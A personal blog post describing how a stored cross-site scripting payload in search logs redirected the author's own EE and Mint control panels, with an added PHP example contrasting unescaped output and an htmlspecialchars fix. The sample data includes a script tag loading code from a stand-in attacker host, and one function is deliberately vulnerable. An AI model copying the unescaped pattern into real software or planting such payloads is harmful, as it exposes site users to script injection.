In which I show how little I know about secure PHP programming

Sunday, October 01, 2006

This is embarrassing. For the last few days, I have been unable to access my EE control panel. I have the control panel home page bookmarked, and whenever I tried to access the page, I’d see the page loading for less than a second, and then I’d get automatically redirected to the Google homepage.

At first I thought it was a bug or a glitch, so I cleared out my browser’s cache and restarted the browser. That didn’t work. The same thing happened when I tried accessing the control panel in Safari and Internet Explorer. With Safari I was logged in via cookies, and with Internet Explorer, I wasn’t, but that didn’t make a difference.

Then I realized that I couldn’t access my Mint control panel either; it also redirected me to Google.

My next thought was that maybe someone had hacked my PHP files and added some redirecting code to them, or to my .htaccess file. I checked those, and I didn’t find anything.

At this point I was annoyed and out of ideas, so I ignored the problem for a day or two, hoping that it would just go away. It didn’t. Err.

Finally, and this took me a few days, I realized that even though I couldn’t access the EE control panel home page, I could access the other parts of the control panel, such as the Admin page or the My Account page. So, it must be something in the Mint control panel page and the EE control panel home page that was causing this.

It turned out to be something I had written: an extension for EE and a custom Pepper for Mint. They both do the same thing, which is to display the recent searches made in EE. And someone had made the following search:

The search term contained a link to a JavaScript file, and the contents of that file were just one simple line, which redirected anyone who loaded it to Google:

Scary hmm?

When displaying the recent searches, I was simply pulling the search terms from the database and outputting them raw, without checking whether there was any malicious code in there. So when I tried to access the page, the JavaScript file was loaded and I got redirected to Google.

It could have been worse than a simple redirect, too. The JavaScript could have contained much nastier code.

To get my control panel home page back, I edited my PHP code and wrapped the search terms in a call to htmlspecialchars. It works, but there’s probably more I could do to make sure this and other similar things don’t happen again.
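As an added illustration of the bug and the fix described above (example code, not the author’s EE extension or Mint Pepper), here is the raw output beside the escaped version in PHP 7 syntax; the search terms and the hostname in the sample data are constructed.

```php
<?php
// Added example, not the author's EE extension or Mint Pepper code.
// Assumes the recent search terms arrive as an array of strings already
// read from the database; the sample terms below are constructed.

// Vulnerable version: mirrors what the post describes. The raw term is
// placed straight into the markup, so a stored <script> tag executes for
// whoever views the control panel page.
function render_searches_raw(array $terms): string
{
    $html = "<ul>\n";
    foreach ($terms as $term) {
        $html .= "  <li>" . $term . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Hardened version: every term passes through htmlspecialchars() before it
// reaches the markup. ENT_QUOTES also escapes single quotes, and the explicit
// charset keeps the escaping consistent with the page encoding.
function render_searches_safe(array $terms): string
{
    $html = "<ul>\n";
    foreach ($terms as $term) {
        $safe = htmlspecialchars($term, ENT_QUOTES, 'UTF-8');
        $html .= "  <li>" . $safe . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Constructed sample data: one harmless search and one stored search term of
// the kind the post describes (the hostname is a placeholder).
$recent_searches = [
    'php security',
    '<script src="http://attacker.example/redirect.js"></script>',
];

echo "Raw (vulnerable):\n", render_searches_raw($recent_searches), "\n";
echo "Escaped (safe):\n", render_searches_safe($recent_searches);
```

htmlspecialchars is the right escape when the term lands in HTML text or a quoted attribute; a term echoed into a JavaScript string or an unquoted attribute needs context-specific escaping instead.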

And I found that if you do a search for this domain in Google, you can see that my site isn’t the only one this has happened to.
